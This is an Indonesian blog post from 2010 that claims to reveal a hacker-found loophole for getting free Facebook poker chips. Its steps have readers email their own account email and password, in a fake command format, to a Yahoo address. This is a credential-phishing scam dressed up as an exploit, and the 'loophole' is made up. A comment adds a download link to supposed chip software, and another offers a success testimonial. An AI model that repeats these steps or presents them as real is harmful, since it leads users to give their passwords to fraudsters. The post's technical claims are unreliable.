For Advertising can simply send an email to yohaneskolelupun@gmail.com or contact persons at +6281340491888 atau jika anda ingin mendapatkan uang gratis join aja di komisi gratis dan undang temen anda sebanyak-banyaknya

Sabtu, 13 Februari 2010

rahasia "cara mendapatkan chips poker facebook gratis dan aman"

Dapat dibilang cara ini cara yg harus cepat kita pakai, karena ini sebuah celah dalam system Poker Texas Holdem Facebook itu sendiri. Cukup rumit tuk menerangkan cara kerja system ini, karena harus mengerti system dan bahasa program game online. Tapi tenang saja, berkat jasa kawan2 kita di underground (hacker) sudah berbaik hati membagi ilmu untuk para pengemar poker di facebook.
Kita mulai; dalam permainan Poker Texas Holdem Facebook, setiap gerakan dalam pertandingan terekam sebagai perintah khusus ke system Poker Texas Holdem Facebook tersebut. Perintah itu yang membuat system bereaksi sesuai fungsinya (membagi kartu dan mengurangi atau menambah nilai chip pada pemain), dan ternyata perintah tersebut dapat kita akali dengan sebuah email khusus ke dalam system Poker Texas Holdem Facebook.
Ikuti langkah berikut:
1. Login Facebook dan masuk ke Poker Texas Holdem, ikuti sebuah pertandingan Texas Holdem Rules, dan anda harus melakukan call 1 x, lalu SEBELUM (ingat..!!! sebelum) 3 kartu dibagi terbuka dan diletakkan di pusat meja,
memulai ronde pasang taruhan yang kedua, anda segera keluar dari arena dengan klik salah satu link di menunya Facebook, misalnya menu Home/Beranda. Ingat!! Home/beranda-nya Facebook, bukan Home-nya Poker. Saat halaman home/beranda Facebook telah terbuka;

2. Logout dari facebook.

3. Login ke yahoo.
Ingat..!! account yahoo anda harus yang barusan anda logout di facebook tadi agar cara ini bekerja dengan baik dan harus merupakan alamat email yang anda gunakan pada saat bermain Poker Texas Holdem tadi.

4. Jika sudah masuk ke yahoo, tulislah sebuah email yang anda tujukan (perintah) pada system Poker Texas Holdem Facebook dengan alamat:

reset_m@yahoo.com

Pada baris SUBJECT/JUDUL masukkan/ketik kalimat: TRUE BILL

lalu pada baris pertama mail anda tuliskan: bill$nilai chip//winlastplayed^^=EMAIL KAMU^^log\\PASSWORD KAMU\\^^cash=true.

Contoh : bill$100000//winlastplayed^^=arjuna@yahoo.com^^log\\123456\\^^cash=true. (nilai chip yang anda cantumkan, tidak boleh lebih dari 8x nilai chip yang anda miliki)

send…

5. Tunggu sampai masuk sebuah pesan dari system dgn pesan: TRUE
(lamanya pesan ini terkirim ke anda bervariasi sesuai lamanya permainan yg anda ikuti tadi berakhir dengan “pemenangnya” adalah anda…

6. Login ke facebook (pastikan setelah mendapat pesan TRUE tersebut) agar tidak terjadi crash perintah, lalu anda bisa liat pertambahan $100000 pada chips sebagai hasil “kemenangan” anda

Untuk kesenangan kita bersama, maka agar jangan sampai system Poker Texas Holdem Facebook menutup celah ini, maka disarankan hanya menggunakan cara ini maksimal 2x dalam sehari, lebih dari itu dikhawatirkan account anda akan dibanned.

Ok, selamat bersenang-senang.

3 komentar :

boulevard mengatakan...

poker lovers, I have a new software creation Chris Weisberg, to send without any subject of poker chips banned. 100% honest and successful.
Download:
http://www.mediafire.com/?r22z4y2z2gn

iqbal mengatakan...

thanks ya buat infonya gw dapet banyak chip deh hehehehe akhirnya gw bisa beli laptop gara2 jual chip... hehehehe

Tongkonan mengatakan...

Sayang, saya gak suka main poker.

Poskan Komentar

Silahkan masukan komentar anda' kritik maupun saran'

 
Design by Yohanes Y.K | Facebook joe167 - Linkedin | My Twitter